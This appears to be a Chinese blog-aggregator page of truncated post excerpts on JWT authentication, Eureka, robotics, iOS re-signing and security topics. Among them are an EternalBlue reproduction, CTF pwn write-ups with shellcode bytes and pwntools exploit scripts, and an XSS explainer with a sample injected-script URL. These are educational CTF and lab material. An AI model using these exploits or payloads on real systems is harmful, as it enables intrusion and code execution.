payload

drf-jwt认证

纵然是瞬间 提交于 2019-12-05 11:41:51
JWT认证 工作原理 """ 1) jwt = base64(头部).base(载荷).hash256(base64(头部).base(载荷).密钥) 2) base64是可逆的算法、hash256是不可逆的算法 3) 密钥是固定的字符串,保存在服务器 """ drf-jwt 官网 http://getblimp.github.io/django-rest-framework-jwt/ 安装子:虚拟环境 pip install djangorestframework-jwt 使用:user/urls.py from django.urls import path from rest_framework_jwt.views import obtain_jwt_token urlpatterns = [ path('login/', obtain_jwt_token), ] 测试接口:post请求 """ postman发生post请求 接口:http://api.luffy.cn:8000/user/login/ 数据: { "username":"admin", "password":"admin" } """ drf-jwt开发 配置信息:JWT_AUTH到dev.py中 import datetime JWT_AUTH = { # 过期时间 'JWT_EXPIRATION

PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现

為{幸葍}努か 提交于 2019-12-05 11:07:45
猫宁!!! 参考: https://www.anquanke.com/post/id/86245 https://xz.aliyun.com/t/2536 https://www.cnblogs.com/backlion/p/9484949.html https://www.jianshu.com/p/91588e284fe8 “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限,危害极大。 微软的漏洞2个漏洞公告 https://support.microsoft.com/zh-cn/help/4012598/title https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010?redirectedfrom=MSDN windows 2008R2镜像从itellme站点获取,种类齐全,比较干净。 https://msdn.itellyou.cn/ 记得进行新建,建立系统保留分区哦,用于存放系统引导文件,类似于centos7的/boot分区,可以避免系统无法正常启动。 虚拟机中的Windows 2008 R2一定要设置为网卡桥接模式 ip是192.168.100.27,先用nmap扫描一下有没有永恒之蓝漏洞存在,扫描脚本在/usr/share/nmap

stack pivoting

强颜欢笑 提交于 2019-12-05 10:52:25
stack pivoting 翻为堆栈旋转 操作是利用' jmp esp' 控制程序流程 X-CTF Quals 2016 - b0verfl0w 可以溢出并且没有开启NX 但是这里只允许溢出14位 很难进行rop 那么可以在栈上布置shelcode 现在的目标就是让eip跳到栈上shelcode位置 因为程序本身会开启 ASLR 保护 我们很难知道栈上的地址 又退栈的时候esp相对shellcode偏移可以计算 也就是0x20+p32(_ebp)+p32(ret_addr)=0x28 因为eip会返回到ret_addr 我们将‘jmp esp’ 作为ret_addr 那么 程序就等价于执行ret_addr的下面一个语句 找一下jmp 然后 esp减0x28 然后跳转到esp去执行shellcode from pwn import * io=process('./flow') shellcode= "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73" shellcode+= "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0" shellcode+= "\x0b\xcd\x80" # shellcode=asm(shellcraft.sh()) jmp_esp=0x08048504 sub_esp_jmp=asm('sub esp

【攻防世界】高手进阶 pwn200 WP

孤者浪人 提交于 2019-12-05 09:43:37
题目链接 PWN200 题目和 JarvisOJ level4 很像 检查保护 利用checksec --file pwn200可以看到开启了NX防护 静态反编译结构 Main函数反编译结果如下 int __cdecl main() { int buf; // [esp+2Ch] [ebp-6Ch] int v2; // [esp+30h] [ebp-68h] int v3; // [esp+34h] [ebp-64h] int v4; // [esp+38h] [ebp-60h] int v5; // [esp+3Ch] [ebp-5Ch] int v6; // [esp+40h] [ebp-58h] int v7; // [esp+44h] [ebp-54h] buf = 1668048215; v2 = 543518063; v3 = 1478520692; v4 = 1179927364; v5 = 892416050; v6 = 663934; memset(&v7, 0, 0x4Cu); setbuf(stdout, (char *)&buf); write(1, &buf, strlen((const char *)&buf)); sub_8048484(); return 0; } sub_8048484()反编译如下: ssize_t sub_8048484()

三、eureka服务端获取服务列表

送分小仙女□ 提交于 2019-12-05 09:26:11
所有文章 https://www.cnblogs.com/lay2017/p/11908715.html 正文 eureka服务端维护了一个服务信息的列表,服务端节点之间相互复制服务信息。而作为eureka的客户端将会从eureka服务端请求这个服务信息列表,选择对应的实例。本文就来看看eureka服务端对客户端提供的获取服务信息列表的http接口。 eureka服务端基于jersey来提供http服务调用,所以我们先找到它的Resource。 ApplicationsResource @GET public Response getContainers(@PathParam("version") String version, @HeaderParam(HEADER_ACCEPT) String acceptHeader, @HeaderParam(HEADER_ACCEPT_ENCODING) String acceptEncoding, @HeaderParam(EurekaAccept.HTTP_X_EUREKA_ACCEPT) String eurekaAccept, @Context UriInfo uriInfo, @Nullable @QueryParam("regions") String regionsStr) { // ... Key cacheKey =

读懂JWT的使用,你就会用PHP如何实现了

南楼画角 提交于 2019-12-05 08:55:46
要如何用php实现JWT认证,那我们首先就来认识一下什么是JWT。 什么是JWT JWT(json web token)是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准。 JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源。 比如用在用户登录上。 JWT定义了一种用于简洁,自包含的用于通信双方之间以 JSON 对象的形式安全传递信息的方法。JWT 可以使用 HMAC 算法或者是 RSA 的公钥密钥对进行签名。 JWT 有两个特点: 自包含(Self-contained):负载中包含了所有用户所需要的信息,避免了多次查询数据库 简洁(Compact):可以通过URL, POST 参数或者在 HTTP header 发送,因为数据量小,传输速度快 JWT组成 JWT由header,payload,signature三个部分 ,下面我们用官网的实例先来讲解一个这三个部分的用法。 header部分: jwt的头部承载两部分信息: 声明类型,这里是jwt 声明加密的算法 通常直接使用 HMAC SHA256 完整的头部就像下面这样的JSON: { "alg": "HS256", "typ": "JWT"} 对应base64UrlEncode编码为: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 说明

ABB机器人之LOADDATA

最后都变了- 提交于 2019-12-05 06:46:27
ABB机器人之LOADDATA loaddata 是用来描述 连接到 机器人机械 接口的负载 ( 机器人的 安装法兰 ) 。 loaddata数据通常定义有效载荷或负荷(通过指令gripload设置机器人抓手负载 或mechunitload指令设置变位机负载。loaddata通常也 作为 tooldata的一部分,用来描述 描工 具负载 。( loaddata 一般用于搬运机器人,用来优化伺服驱动器的PID参数,带焊枪的焊接机器人由于焊枪质量偏小,一般不需要设定此参数) 指定的 荷载被用来 建立一个 机器人的动力学模型, 使 机器人 以最好的方式控制运动 。 loaddata 是确定机器人实际负载大小的重要工具(例如一个搬运机器人抓手上的夹紧部分)。 不正确的 负载数据可以 导致 机器人的机械 结构 超载 。当指定不正确的 数据 时 , 往往会导致 以下结果 : 机器人 不会使用 它的最大容量。 受影响的路径精度包括过冲的风险(当伺服电机的惯量匹配不恰当时,所引起的伺服电机PID闭环超调震荡)。 机械 单元过载的风险。 Load Identify这是ABB机器人工具和载重的重量和重心数据的识别功能。你只需要执行一下这个程序,你就可以轻松设定TOOLDATA和LOADDATA了。为机器人设定正确的TOOLDATA和LOADDATA是非常重要的,这是因为有了正确的数据设定以后

iOS 企业重签名 无需替换包名

余生颓废 提交于 2019-12-05 06:11:28
1、首先准备好待签名的ipa (此ipa 为非299$的开发账号签名后的ipa),企业版发布证书,embedded.mobileprovision配置文件,entitlements.plist 文件。证书配置与创建配置文件这里不做赘述。 entitlements.plist 文件格式为: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>application-identifier</key> <string>AAAAAA.com.test.test</string> <key>com.apple.developer.team-identifier</key> <string>AAAAAA</string> <key>get-task-allow</key> <false/> <key>keychain-access-groups</key> <array> <string>AAAAAA.com.test.test</string> </array> </dict> </plist>

xctf pwn(新手练习)level3

一笑奈何 提交于 2019-12-05 04:28:17
xctf pwn level3 #-*-coding:utf-8-*- from pwn import * p = process('./level3') #p = remote("111.198.29.45","36722") elf = ELF('./level3') libc = ELF('/lib/i386-linux-gnu/libc.so.6') #libc = ELF('./libc_32.so.6') write_plt = elf.plt['write'] print "write_plt: " + hex(write_plt) # print hex(elf.symbols['write']) write_got = elf.got['__libc_start_main'] print "write_got: " + hex(write_got) libc_main = libc.symbols['__libc_start_main'] print "write_libc: " + hex(libc_main) system_libc = libc.symbols['system'] print "system_libc: " + hex(system_libc) vulnfun = 0x804844B # pause() #write(1,write_got

什么是xss攻击?

拥有回忆 提交于 2019-12-05 02:34:23
一.什么是xss攻击   跨站脚本攻击(XSS),英文全称 Cross Site Script   XSS攻击,一般是指黑客通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式   XSS攻击分为三种,反射型XSS、存储型XSS、DOM Based XSS. 了解什么是xss攻击,例子:   本地服务器demo目录下有个index.php,通过提交信息显示在页面上显示数据。   正常情况下:http:localhost/demo/index.php?name=张三,   网页上就会显示张三出来,这个信息是用户在浏览器的url中输入的,可以正常显示在页面上,但是如果在页面中插入一段javascript代码,页面就无法正常显示了,   例:http:localhost/demo/index.php?name=<script>window.open(http://www.fanyi.com)</script>,   例子虽然简单但是提现xss攻击的完整流程。 1.反射性XSS   也被称为非持久性XSS,这种攻击方式把XSS的Payload写在URL中,通过浏览器直接“反射”给用户。用户将一段含有恶意代码的请求提交给 Web 服务器,Web 服务器接收到请求时,又将恶意代码反射给了浏览器端,这种攻击方式通常需要诱使用户点击某个恶意链接,才能攻击成功。